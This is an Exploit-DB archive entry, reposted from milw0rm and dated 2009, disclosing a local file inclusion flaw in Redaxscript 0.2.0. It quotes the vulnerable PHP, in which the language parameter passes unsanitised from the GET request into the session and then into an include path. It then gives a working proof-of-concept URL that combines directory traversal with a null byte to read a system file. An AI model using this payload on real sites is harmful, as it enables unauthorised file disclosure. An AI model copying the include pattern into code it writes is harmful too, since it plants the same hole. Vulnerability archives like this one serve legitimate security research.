exploit-db-mirror/exploits/php/webapps/8395.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

29 lines
No EOL
969 B
Text

##################################################################################
[+] Redaxscript 0.2.0 (index.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##################################################################################
[+] Local File Inclusion
index.php :
-----------------------------------------------------------------
include('template/'.$_SESSION[_root.'template'].'/index.php');
-----------------------------------------------------------------
function.php :
-----------------------------------------------------------------
if($_GET['language']) {
$_SESSION[_root.'language'] = $_GET['language'];
-----------------------------------------------------------------
- PoC :
http://127.0.0.1/index.php?language=../../../../../BOOTSECT.BAK%00
##################################################################################
# milw0rm.com [2009-04-10]